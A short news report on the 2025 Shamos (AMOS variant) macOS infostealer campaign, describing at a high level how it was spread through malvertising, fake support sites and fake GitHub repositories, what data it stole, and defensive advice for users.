From June to August 2025, cybersecurity experts from CrowdStrike recorded a large-scale campaign distributing Shamos malware, a variant of the Atomic macOS Stealer (AMOS) infostealer. The program attempted to compromise over 300 client environments worldwide, utilizing malvertising methods and fake GitHub repositories. The attacks, carried out by the COOKIE SPIDER group, were successfully blocked by the Falcon platform, but they underscore the growing threat to macOS users, especially crypto wallet owners.
The attackers lure victims through malicious ads on Google or fake tech support sites like mac-safer.com and rescue-mac.com. These resources offer instructions for solving common macOS problems like printer failures or security errors. Users are convinced to copy and paste a command into Terminal, often encoded in Base64, which downloads a malicious Bash script. This script installs the Shamos Mach-O executable, bypassing Gatekeeper protection mechanisms. Fake GitHub repositories, mimicking legitimate projects like iTerm2, are also used for distribution.
Once installed, Shamos scans the system, collecting passwords, Keychain data, Apple Notes, and browser information. Special attention is given to crypto wallet files, including popular platforms such as Electrum, Binance, Exodus, Atomic, and Coinomi. The collected data is archived into an out.zip file and sent to the attackers' servers using the curl command. Shamos operates in a malware-as-a-service model, where COOKIE SPIDER provides the tool to affiliates for targeted attacks, increasing the scale of the threat.
CrowdStrike advises users to avoid downloading files from untrusted sources, including suspicious GitHub repositories and ad links. For macOS issues, users should turn to official Apple forums or use the built-in help feature (Cmd + Space → 'Help'). Implementing endpoint protection and DNS filters can prevent compromise. To protect crypto assets, experts recommend using multi-factor authentication, regularly updating software, and storing keys in hardware wallets.
Shamos attacks highlight the vulnerability of macOS users, especially in the context of the cryptocurrency market, where wallet theft losses can reach millions of dollars. The rise of decentralized finance (DeFi) makes such threats particularly relevant. While incidents may temporarily undermine trust in platforms, they also stimulate the development of more reliable asset storage solutions, such as cold wallets and improved blockchain protocols. Users should strengthen security measures to minimize risks.